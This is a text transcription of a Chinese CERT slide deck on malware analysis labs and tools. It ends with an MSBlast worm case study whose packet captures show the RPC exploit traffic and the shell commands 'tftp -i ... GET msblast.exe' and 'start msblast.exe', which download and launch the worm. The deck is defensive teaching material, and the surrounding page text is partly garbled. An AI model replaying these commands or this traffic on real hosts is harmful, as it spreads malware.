恶意代码分析技术及相关工具 郑辉 清华大学网络中心 CERNET Computer Emergency Response Team

Similar documents
民 國 105 年 大 專 程 度 義 務 役 預 備 軍 官 預 備 士 官 考 選 簡 章 目 錄 壹 考 選 依 據 1 貳 考 ( 甄 ) 選 對 象 1 參 資 格 規 定 1 肆 員 額 及 專 長 類 別 2 伍 報 名 及 選 填 志 願 日 期 方 式 3 陸 選 填 官 科 (

SIK) 者, 需 實 施 1 年 以 上, 經 體 格 檢 查 無 後 遺 症 者 5. 身 體 任 何 部 分 有 刺 青 紋 身 穿 耳 洞 者, 不 得 報 考, 各 項 檢 查 結 果 須 符 合 體 位 區 分 標 準 常 備 役 體 位 二 在 校 軍 訓 成 績 總 平 均 70 分

標準 BIG 中文字型碼表 A 0 9 B C D E F 一 乙 丁 七 乃 九 了 二 人 儿 入 八 几 刀 刁 力 匕 十 卜 又 三 下 丈 上 丫 丸 凡 久 么 也 乞 于 亡 兀 刃 勺 千 叉 口 土 士 夕 大 女 子 孑 孓 寸 小 尢 尸 山 川 工 己 已 巳 巾 干 廾

1 2 / 3 1 A (2-1) (2-2) A4 6 A4 7 A4 8 A4 9 A ( () 4 A4, A4 7 ) 1 (2-1) (2-2) ()

4 / ( / / 5 / / ( / 6 ( / / / 3 ( 4 ( ( 2


Ps22Pdf


untitled


# #$$%& ()*+, -$. #-# / & 0 & 0 #& $& 1 #.& /# 2(3 #$$# $..-$ #$ 0 0 $$$$4 0 0 %# 0-5$ 6 /-0 /0 #$ 0 5$$$ #$$% 0 0 #$$% ()*+, -$. #-# / 7, $8 $$

!"#$!"%&!"$!""( )( )( #( "#*!&#) %&*!(+,- %.!/( )( #( ,-2 89 /

2


untitled

民國八十九年台灣地區在校學生性知識、態度與行為研究調查


!!"#$ " # " " " " " "$%%& " $%% " "!!

Microsoft Word - NHIS2013_C_130716_送印_.doc

!!""# $ %#" & $$ % $()! *% $!*% +,-. / 0 %%"#" 0 $%1 0 * $! $#)2 "

! " # $ % & (( %) "*+,- &.(/-) & ( 0 & 1! % " % # % & & $ % "/()%!"# (( (02-03 /(((.1/.2( 4 //). /$0 3)0%. /1/%-2 (( ) / ((0 // "*+,- &.(/-) & ( 0 & 1

数 学 高 分 的 展 望 一 管 理 类 联 考 分 析 第 一 篇 大 纲 解 析 篇 编 写 : 孙 华 明 1 综 合 能 力 考 试 时 间 :014 年 1 月 4 日 上 午 8:30~11:30 分 值 分 配 : 数 学 :75 分 逻 辑 :60 分 作 文 :65 分 ; 总

高二立體幾何

※※※※※


校园之星

2.181% 0.005%0.002%0.005% 2,160 74,180, ,000, ,500,000 1,000,000 1,000,000 1,000,000 2

Visualize CMap

CIP. / ISBN Ⅰ.... Ⅱ.... Ⅲ. Ⅳ. G CIP http / /press. nju. edu. cn





!!!!"#$ " " %& ( " # " " " " " "$%%& " $%% " "!!

untitled


Ps22Pdf

( )1

例 009 年高考 全国卷Ⅱ 理 8 如 图 直 三 棱 柱 ABC ABC 中 AB AC D E 分 别为 AA BC 的中点 DE 平面 BCC 证明 AB AC 设二面角 A BD C 为 0o 求 BC 与平面 BCD 所 成角的大小 图 - 略 证明 以 D 为坐标原点 DA DC DD

E. (A) (B) (C) (D). () () () (A) (B) (C) (D) (E). () () () (A) (B) (C) (D) (E). (A)(B)(C) (D) (E) (A) (B) (C) (D) (E) (A) (B)(C) (D) (E). (A) (B) (C)

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! "!!!!!!!!!!!!!!!!!!!!!!!!!!!! #! $%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! "%!!!!!!!!!!!!!

( ) Wuhan University


!"# $%& ()) *+,+)-./01!"# $%& ()) *+,+)-./01!"#! "#$ 2!"# ):; 2!B! 2 "B # $ 2 %4 C C 2 &4 %D?<?4 6<5 2 (9D =6

!% &$ % (% )% &%!""* +% ($ % )% &%,% ($ % )% &% ) *% ($ ( #% )$ % (% &% ( -% ($.% ($ ( ) & /. /!""*! $!"

!" #$%#&#! () *+, -.!" #$%#/# $!" /$12 0!" 3 4 $$255 % 67 8 $ %% #! " # $9&$

! "# $! ""# %& %! ($)& ($*$ + "# &*, ""# & &! ) *! $ "#! (- ((! %-,- %- $- %

Ps22Pdf


:,,,, ( CIP ) /,. :, ISBN CIP ( 2001) : : 127, : : : ht t p: / / www. nwpup. com : :

zyk00207zw.PDF

# " $ % $ # ( $ $ %% * $ %+ $, -., / ", 0, %, %%%%, " % 2 %% #. $ 3 *3 %45 6" %% 9: :" : "

<453A5CC2EDC0F6C5C5B0E6CEC4BCFE5CC3F1B7A8A1A4C9CCB7A8A1A4C3F1CAC2CBDFCBCFB7A8D3EBD6D9B2C3D6C6B6C8D5AACEC4BCFE574F52445CB9D9B7BDD0DEB6A9B5E7D7D3B7FECEF1A3A8A1B6C3F1CBDFBDE2CACDA1B7BACDA1B6C1A2B7A8B7A8A1B7A3A92E646F63>

& ($ ) * +!"", &#!""#! +$ ) ( * +!"", - ($ ) * + % ($ ) * + * ), ($ ( # *$ ) ( + ) (. ($ / ($ ) ( * + &/ )! $!%

種 類 左 淋 巴 總 管 ( 胸 管 ) 右 淋 巴 總 管 血 管 連 接 連 接 左 鎖 骨 下 靜 脈 連 接 右 鎖 骨 下 靜 脈 淋 巴 收 集 範 圍 左 上 半 身 及 下 半 身 淋 巴 液 右 上 半 身 淋 巴 液 長 度 很 長 很 短 (3) 循 環 路 徑 : (4)

"!! " "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! " #$$%!& #$$%! " #! "

E170C2.PDF

02所有分支机构的营业场所和电话.xls

untitled

! "# $ %& ( "# $ %& ) * $ %& + $ %& * $ %& -,)

钢铁金相图谱

(E). (A) (B) (C) (D) (E). (A) (B) (C) (D) (E) (A) (B) (C) (D) (E) (A) (B) (C) (D). ( ) ( ) ( ) ( ) ( ) ( ) (A) (B) (C) (D) (E). (A) (B) (C) (D) (E). (

!!! "!! # " $ % & % & " &"($

!!!" #$ %& ()#*+ %,!" #--. #! % %! % %" & $! % $" # - #+$/0 - -*,/0 ). %*- #)%* #)%, 9:;"74 < #)*+ < 9:;"74 #- = #*0>? A7BC""7 D #)*+ #)

!"#$!%&!! (# )*&#!(!$!(!( )&** )&#*!%!!# )!"($!%!!($#!%*# + +,, &- +./ :: 43 ;<3=3 9<3 635=329 A: B< 732 C9 2 A529

untitled

!! "!!"#! # $ %&& ( "! )*+, " - &. - &/%%&& - 0!!$! "$! #$ - -! $$ 12.3! 4)5 %&& &.3 "3!!!!!!!!!!!! &/& - 0.&3.322!!!.! 2&& - 2/& - &362! /&&&//!!! 78

<4D F736F F D20C1E3B5E3CFC2D4D8C4A3B0E52E646F63>

第三章 相图基础

! "! #$# +&#!! %& #!"# )*+ % #!"!!!"!! =1.>7? "$+"+ (!! &< =1.>7? % $%& $& ( )*+ $*& $(B *& ;; / %" ;; C% %( &&& 0, ;17 -#D" (D-"" B ( %&& 0

!""# $!""%!"&" #

Microsoft Word - ZLI14A0-105

实 信 用 的 原 则 " 其 中, 诚 实 信 用 原 则 是 指 民 事 主 体 进 行 民 事 活 动 时, 均 应 诚 实, 不 作 假, 不 欺 诈, 不 损 害 他 人 利 益 和 社 会 利 益, 正 当 地 行 使 权 利 和 履 行 义 务 甲 将 平 房 售 与 丙 而 未 告

比 賽 表 Competition Schedule 報 到 : 比 賽 開 始 前 15 分 鐘 Reporting : 15 minutes before the scheduled time for the match 各 參 賽 隊 伍 必 須 依 照 大 會 編 定 的 出 場 比 賽,

5. 10(1) 10(2) A-1 17(2) 7. A-2 18A B

<4D F736F F D F F315FAAFEA5F333AAF9B645C2E5C0F8AA41B0C8C249BCC6B24DB3E6B443C5E9A5D3B3F8AEE6A6A12E646F63>

# $ %"! &" # " "! ( #)* " $ * +, -./0! &-1 &-1 &-1 # ) ( & & $ "! & " # " ) /" ( %" 3" " & #(* " $.. -1&5 6. #?* " $. 7! 8-1&5 6


untitled

#$%&% () % ()*% +,-. /01 % + (/) " " " 2- %** -340 $%&% 5!$%&% () % ()*% +,-. /01 % + (/) " " " 2- %** -340 /64 7%,(8(, *--9( ()6 /-,%/,65 :$%&

序:


WCA Regulations and Guidelines

1. ( )( ) A. B. C. D. 2. ( )( ) A. : B. : C. : D. : 3. ( )( ) A. : B. : C. : D. : 1 D : 2


njj00118zw.PDF


(Microsoft Word - \246D\252k\267\247\255n_\275\306\277\357_.docx)

A. B. C. D. 解 析 : 几 何 体 的 主 视 图 为 选 项 D 俯 视 图 为 选 项 B 左 视 图 为 选 项 C. 答 案 :A. 5. 剪 纸 是 扬 州 的 非 物 质 文 化 遗 产 之 一 下 列 剪 纸 作 品 中 是 中 心 对 称 图 形 的 是 ( ) A. B

B3C1

中华人民共和国海关进出口税则

" #" #$$" "#$$% # & $%& ()*+,- #$$% " & " & ( % ( ( ( % & ( % #" #" #" #"

xtj

zt

! "! "! # $ # # %#!# $# &# # ()*+, )-.) /# () () 0# 1,2.34, 4*.5)-*36-13)7,) ,9,.).6.(+ :# 13).+;*7 )-,7,<*7,-*=,>,7?#

4 & & & 5+)6,+6 5+)6,+6 7)8 *(9 ):*");, +!*((6,<6 #!;";<=*#!8 > #)+9 " =68 )(( 8"=*");,8 >?=*%),<8 > 6B#(*,*9 ";=C <=*#!)+8 ),"6=*+")D6

tbjx0048ZW.PDF

年 度 工 作 計 劃 目 錄 1 學 校 發 展 計 劃 至 2015 年 度 全 校 關 注 事 項 至 2014 年 度 學 校 關 注 事 項 年 度 九 龍 倉 集 團 學 校 起 動 計

zt

山东2014第四季新教材《会计基础》冲刺卷第三套

Transcription:

恶意代码分析技术及相关工具 郑辉 清华大学网络中心 CERNET Computer Emergency Response Team zhenghui@ccert.edu.cn

主要内容 分析环境准备 代码分析 静态代码分析 动态调试分析 行为特征分析 主机信息获取 网络信息获取 by spark 2

分析环境准备 硬件环境准备 内存 软件环境准备 虚拟机 单机防火墙 by spark 4

VMWare 网络 Host Host-only only DHCP Windows XP 系统还原 复制多个系统 修改 MAC 主机名 by spark 5

by spark 6

by spark 7

ZoneAlarm Pro Block Internet connection by spark 8

by spark 9

主机信息获取工具 内存信息 进程列表 Process Explorer 磁盘信息 文件系统信息 文件内容 FUndelete 注册表信息 by spark 10

网络信息获取工具 Sniffer Tcpdump snort IDS TCPView Netcat by spark 11

FileMon & RegMon 文件访问 注册表访问 Create Set value by spark 12

by spark 13

Winalysis 系统快照 变化比较 by spark 14

by spark 15

by spark 16

代码分析工具 文件格式处理工具 PEiD ProcDump 静态代码分析工具 UltraEdit IDA Pro 动态调试工具 SoftIce 组合调试工具 OllyDbg W32Dasm by spark 20

FUndelete by spark 29

by spark 30

IDA Pro by spark 31

by spark 32

by spark 33

by spark 34

by spark 35

PEiD by spark 36

OllyDbg by spark 37

by spark 38

by spark 39

SoftICE by spark 40

Tcpdump Tcpdump -n -nn -i i eth0 -X -s s 1500 by spark 43

TCPView Pro by spark 44

by spark 46

实例分析 冲击波 蠕虫, msblast by spark 47

by spark 48

by spark 49

by spark 50

by spark 51

by spark 52

by spark 53

04:23:50.050893 arp 0x0000 0001 0800 0604 0001 000c 29d0 9d6e c0a8 0x0010 8780 0000 0000 0000 c0a8 8782 0026 0100 0x0020 0001 0000 0000 0000 0233 3803 3133 arp who-has has 192.168.135.130 tell 192.168.135.128 0001 0800 0604 0001 000c 29d0 9d6e c0a8...)..n.. c0a8 8782 0026 0100...&.. 0233 3803 3133...38.13 04:23:50.052424 arp 0x0000 0001 0800 0604 0002 000c 291d 3431 c0a8 0x0010 8782 000c 29d0 9d6e c0a8 8780 1102 8015 0x0020 c0a8 8782 008a 00b6 0000 2046 4446 arp reply 192.168.135.130 is-at 0:c:29:1d:34:31 0001 0800 0604 0002 000c 291d 3431 c0a8...).41.. 8782 000c 29d0 9d6e c0a8 8780 1102 8015...)..n... c0a8 8782 008a 00b6 0000 2046 4446...FDF 04:23:50.071678 192.168.135.128.2448 > 192.168.135.130.135: S 2426236353:2426236353(0) win 16384 <mss 1460,nop,nop,sackOK> (DF) 0x0000 4500 0030 0798 4000 8006 62dc c0a8 8780 E..0..@...b... 0x0010 c0a8 8782 0990 0087 909d 6dc1 0000 0000...m... 0x0020 7002 4000 aa55 0000 0204 05b4 0101 0402 p.@..u...... 04:23:50.071685 192.168.135.130.135 > 192.168.135.128.2448: S 1113903821:1113903821(0) ack (DF) 0x0000 ack 2426236354 win 17520 <mss 1460,nop,nop,sackOK> 0x0000 4500 0030 003e 4000 8006 6a36 c0a8 8782 E..0.>@...j6... 0x0010 c0a8 8780 0087 0990 4264 d2cd 909d 6dc2...Bd...m. 0x0020 7012 4470 90a2 0000 0204 05b4 0101 0402 p.dp...... 04:23:50.077658 192.168.135.128.2448 > 192.168.135.130.135:. ack 0x0000 4500 0028 07a3 4000 8006 62d9 c0a8 8780 E..(..@...b... 0x0010 c0a8 8782 0990 0087 909d 6dc2 4264 d2ce...m.bd m.bd.... 0x0020 5010 4470 bd66 0000 0233 3203 3133 P.Dp.f...32.13...32.13 ack 1 win 17520 (DF) by spark 54

04:23:50.700898 192.168.135.128.2448 > 192.168.135.130.135: P 1:73(72) ack 1 win 17520 (DF) 0x0000 4500 0070 07bf 4000 8006 6275 c0a8 8780 E..p..@.....@...bu bu... 0x0010 c0a8 8782 0990 0087 909d 6dc2 4264 d2ce...m.bd m.bd.... 0x0020 5018 4470 742d 0000 0500 0b03 1000 0000 P.Dpt-...... 0x0030 4800 0000 7f00 0000 d016 d016 0000 0000 H... 0x0040 0100 0000 0100 0100 a001 0000 0000 0000... 0x0050 c000 0000 0000 0046 0000 0000 045d 888a...F...].. 0x0060 eb1c c911 9fe8 0800 2b10 4860 0200 0000...+.H`... 04:23:50.700906 192.168.135.128.2448 > 192.168.135.130.135:. 73:1533(1460) ack 1 win 17520 (DF) 0x0000 4500 05dc 07c0 4000 8006 5d08 c0a8 8780 E...@...]... 0x0010 c0a8 8782 0990 0087 909d 6e0a 4264 d2ce...n.bd n.bd.... 0x0020 5010 4470 99f7 0000 0500 0003 1000 0000 P.Dp...... 0x0390 8601 0000 5c00 5c00 4600 5800 4e00 4200...\.\.F.X.N.B..F.X.N.B. 0x03a0 4600 5800 4600 5800 4e00 4200 4600 5800 F.X.F.X.N.B.F.X. 0x03b0 4600 5800 4600 5800 4600 5800 9f75 1800 F.X.F.X.F.X..u.... 04:23:50.700910 192.168.135.128.2448 > 192.168.135.130.135: P 1533:1777(244) ack 1 win 17520 (DF) 0x0000 4500 011c 07c1 4000 8006 61c7 c0a8 8780 E...@...a... 0x0010 c0a8 8782 0990 0087 909d 73be 4264 d2ce...s.bd s.bd.... 0x00b0 5c00 4300 2400 5c00 3100 3200 3300 3400 \.C.$..C.$.\.1.2.3.4..1.2.3.4. 0x00c0 3500 3600 3100 3100 3100 3100 3100 3100 5.6.1.1.1.1.1.1. 0x00d0 3100 3100 3100 3100 3100 3100 3100 3100 1.1.1.1.1.1.1.1. 0x00e0 3100 2e00 6400 6f00 6300 0000 0110 0800 1...d.o.c d.o.c...... 0x00f0 cccc cccc 2000 0000 3000 2d00 0000 0000...0.-... 0x0100 882a 0c00 0200 0000 0100 0000 288c 0c00.*...(... 0x0110 0100 0000 0700 0000 0000 0000... 04:23:50.700913 192.168.135.128.2448 > 192.168.135.130.135: F 1777:1777(0) 0x0000 4500 0028 07c2 4000 8006 62ba c0a8 8780 E..(..@...b... 0x0010 c0a8 8782 0990 0087 909d 74b2 4264 d2ce...t.bd t.bd.... 0x0020 5011 4470 b675 0000 0236 3103 3133 P.Dp.u 77:1777(0) ack 1 win 17520 (DF) by spark 55 P.Dp.u...61.13...61.13

04:23:50.740919 192.168.135.128.2460 > 192.168.135.130.4444: S 2427830773:2427830773(0) 2 win 16384 <mss 1460,nop,nop,sackOK> (DF) 04:23:50.742142 192.168.135.130.4444 > 192.168.135.128.2460: S 1114621573:1114621573(0) 1 114621573:1114621573(0) ack 2427830774 win 17520 <mss 1460,nop,nop,sackOK> (DF) 04:23:50.770885 192.168.135.128.2460 > 192.168.135.130.4444:. ack 1 win 17520 (DF) 04:23:50.770895 192.168.135.128.2460 > 192.168.135.130.4444: P 1:41(40) 1 ack 1 win 17520 (DF) 0x0000 4500 0050 07c7 4000 8006 628d c0a8 8780 E..P..@...b... 0x0010 c0a8 8782 099c 115c 90b5 c1f6 426f c686...\...bo.....bo.. 0x0020 5018 4470 4a38 0000 7466 7470 202d 6920 P.DpJ8..tftp.-i. 0x0030 3139 322e 3136 382e 3133 352e 3132 3820 192.168.135.128. 0x0040 4745 5420 6d73 626c 6173 742e 6578 650a GET.msblast.exe. 04:23:51.010890 192.168.135.130.4444 > 192.168.135.128.2460: P 1:43(42) 1 0x0000 4500 0052 0046 4000 8006 6a0c c0a8 8782 E..R.F@...j... 0x0010 c0a8 8780 115c 099c 426f c686 90b5 c21e...\..bo.....bo... 0x0020 5018 4448 9abd 0000 4d69 6372 6f73 6f66 P.DH...Microsof 0x0030 7420 5769 6e64 6f77 7320 3230 3030 205b t.windows.2000.[ 0x0040 5665 7273 696f 6e20 352e 3030 2e32 3139 Version.5.00.219 0x0050 355d 5] 04:23:51.026061 192.168.135.130.4444 > 192.168.135.128.2460: P 43:145(102) 4 0x0000 4500 008e 0047 4000 8006 69cf c0a8 8782 E...G@...i... 0x0010 c0a8 8780 115c 099c 426f c6b0 90b5 c21e...\..bo.....bo... 0x0020 5018 4448 c812 0000 0d0a 2843 2920 b0e6 P.DH...(C)... 0x0030 c8a8 cbf9 d3d0 2031 3938 352d 3139 3938...1985-1998 1998 0x0040 204d 6963 726f 736f 6674 2043 6f72 702e.Microsoft.Corp Microsoft.Corp. 0x0050 0d0a 0d0a 433a 5c57 494e 4e54 5c73 7973...C:\WINNT WINNT\sys 0x0060 7465 6d33 323e 7466 7470 202d 6920 3139 tem32>tftp.-i.19 0x0070 322e 3136 382e 3133 352e 3132 3820 4745 2.168.135.128.GE 0x0080 5420 6d73 626c 6173 742e 6578 650a T.msblast.exe. :43(42) ack 41 win 17480 (DF) 3:145(102) ack 41 win 17480 (DF) by spark 56

04:23:51.100883 192.168.135.130.1030 > 192.168.135.128.69: 20 RRQ R " 0x0000 4500 0030 0048 0000 8011 aa21 c0a8 8782 E..0.H...!... 0x0010 c0a8 8780 0406 0045 001c a352 0001 6d73...E...R..ms 0x0020 626c 6173 742e 6578 6500 6f63 7465 7400 RQ "msblast.exe msblast.exe" 626c 6173 742e 6578 6500 6f63 7465 7400 blast.exe.octet. 04:23:51.110890 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 1 0x0000 4500 0220 07ca 0000 8011 a0af c0a8 8780 E... 0x0010 c0a8 8782 0045 0406 020c c00d 0003 0001...E... 0x0020 4d5a 9000 0300 0000 0400 0000 ffff 0000 MZ... 0x0030 b800 0000 0000 0000 4000 0000 0000 0000...@... 0x0040 0000 0000 0000 0000 0000 0000 0000 0000... 0x0050 0000 0000 0000 0000 0000 0000 8000 0000... 0x0060 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468...!..L.!Th 0x0070 6973 2070 726f 6772 616d 2063 616e 6e6f is.program.canno 0x0080 7420 6265 2072 756e 2069 6e20 444f 5320 t.be.run.in.dos. 0x0090 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000 mode...$... 04:23:51.130886 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 1 04:23:51.310945 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 2 04:23:51.310953 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 2 04:23:51.467609 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 2 04:23:52.079245 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 3 04:23:52.080853 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 3 04:23:53.570886 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 4 04:23:53.570892 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 4 04:23:54.350883 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 4 04:23:55.128992 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 5 04:23:55.140886 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 5 04:23:55.940880 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 5 04:23:56.847387 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 6 04:23:56.849210 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 6 04:23:57.668069 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 6 04:23:58.667619 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 7 04:23:58.669365 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 7 04:23:59.437413 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 7 04:24:00.137909 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 8 04:24:00.137916 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 8 04:24:00.948110 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 8 04:24:01.890029 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 9 04:24:01.890034 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 9 04:24:02.408083 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block by 9 spark 57 04:24:03.238745 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 10 04:24:03.238751 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 10

04:24:04.959456 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 11 04:24:04.959463 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 11 04:24:24.459760 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 22 04:24:24.459766 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 22 04:24:24.519703 192.168.135.128.2460 > 192.168.135.130.4444: P 41:59(18) 4 ack 145 win 17376 (DF) 0x0000 4500 003a 07f2 4000 8006 6278 c0a8 8780 E..:..@...bx bx... 0x0010 c0a8 8782 099c 115c 90b5 c21e 426f c716...\...bo.....bo.. 0x0020 5018 43e0 ab28 0000 7374 6172 7420 6d73 P.C..(..start.ms 0x0030 626c 6173 742e 6578 650a blast.exe. 04:24:24.840888 192.168.135.130.4444 > 192.168.135.128.2460:. ack 59 win 17462 (DF) 0x0000 4500 0028 0075 4000 8006 6a07 c0a8 8782 E..(.u@...j... 0x0010 c0a8 8780 115c 099c 426f c716 90b5 c230...\..bo...0..bo...0 0x0020 5010 4436 63e6 0000 2046 4845 5046 P.D6c...FHEPF 04:24:26.528675 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 23 04:24:26.528680 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 23 04:24:28.529285 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 24 04:24:28.529292 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 24 04:24:29.100884 192.168.135.128.2460 > 192.168.135.130.4444: P 59:71(12) 5 ack 145 win 17376 (DF) 0x0000 4500 0034 07f5 4000 8006 627b c0a8 8780 E..4..@...b{... 0x0010 c0a8 8782 099c 115c 90b5 c230 426f c716...\...0bo.....0bo.. 0x0020 5018 43e0 f423 0000 6d73 626c 6173 742e P.C..#..msblast. 0x0030 6578 650a exe. 04:24:29.347038 192.168.135.130.4444 > 192.168.135.128.2460:. ack 71 win 17450 (DF) 0x0000 4500 0028 0078 4000 8006 6a04 c0a8 8782 E..(.x@...j... 0x0010 c0a8 8780 115c 099c 426f c716 90b5 c23c...\..bo...<..bo...< 0x0020 5010 442a 63e6 0000 0000 2046 4446 P.D*c...FDF 04:24:30.599445 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 25 by spark 58 04:24:30.599450 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 25

04:24:32.498966 192.168.135.128.69 > 192.168.135.130.1030: 516 DATA block 26 04:24:32.498971 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 26 04:24:33.578057 192.168.135.128.2460 > 192.168.135.130.4444: R 2427830844:2427830844(0) 2 win 0 (DF) 0x0000 4500 0028 07f9 4000 8006 6283 c0a8 8780 E..(..@...b... 0x0010 c0a8 8782 099c 115c 90b5 c23c 426f c716...\...<bo.....<bo.. 0x0020 5004 0000 a81c 0000 0000 0023 ff53 P...#.S 04:24:34.130922 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 26 04:24:34.138931 192.168.135.128 > 192.168.135.130: icmp: : 192.168.135.128 udp port 69 unreachable 04:24:34.138938 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 26 04:24:34.140654 192.168.135.128 > 192.168.135.130: icmp: : 192.168.135.128 udp port 69 unreachable 04:24:34.140662 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 26 04:24:34.147604 192.168.135.128 > 192.168.135.130: icmp: : 192.168.135.128 udp port 69 unreachable 04:24:34.147612 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 26 04:24:34.148974 192.168.135.128 > 192.168.135.130: icmp: : 192.168.135.128 udp port 69 unreachable 04:24:34.148981 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 26 04:24:34.157128 192.168.135.128 > 192.168.135.130: icmp: : 192.168.135.128 udp port 69 unreachable 04:24:34.157136 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 26 04:24:34.158475 192.168.135.128 > 192.168.135.130: icmp: : 192.168.135.128 udp port 69 unreachable 04:24:34.158483 192.168.135.130.1030 > 192.168.135.128.69: 4 ACK K block 26 04:24:34.166852 192.168.135.128 > 192.168.135.130: icmp: : 192.168.135.128 udp port 69 unreachable 04:24:34.183311 192.168.135.130.1030 > 192.168.135.128.69: 23 ERROR E EUNDEF timeout on receive" 0x0000 4500 0033 0082 0000 8011 a9e4 c0a8 8782 E..3... 0x0010 c0a8 8780 0406 0045 001f d494 0005 0000...E... 0x0020 7469 6d65 6f75 7420 6f6e 2072 6563 6569 timeout.on.recei 0x0030 7665 00 ve. 04:24:34.184833 192.168.135.128 > 192.168.135.130: icmp: : 192.168.135.128 udp port 69 unreachable 0x0000 4500 0038 0815 0000 8001 a25c c0a8 8780 E..8...\...... 0x0010 c0a8 8782 0303 23fe 0000 0000 4500 0033...#...E..3 0x0020 0082 0000 8011 a9e4 c0a8 8782 c0a8 8780 by spark... 59 0x0030 0406 0045 001f d494...e...

References Laurent Oudot.. Fighting Internet Worms With Honeypots. http://www.securityfocus.com/infocus/1740 Ryan Permeh et Dale Caddington (Eeye Eeye), " Decoding and understanding Internet Worms ", 21st November 2001, http://www.blackhat.com/presentations/bh-europe europe-01/dale 01/dale- coddington/bh-europe europe-01 01-coddington.ppt "Honeypots Against Worms 101", Laurent Oudot,, Black Hat Asia, December 2003, Singapore http://www.blackhat.com/html/bh-asia asia-03/bh 03/bh-asia asia-03 03- speakers.html#laurent S. G. Masood. Malware Analysis for Administrators. http://www.securityfocus.com/printable/infocus/1780 S. G. http://worm.ccert.edu.cn http:// by spark 60

2024 © docsplayer.com 隐私 | 条款 | 反馈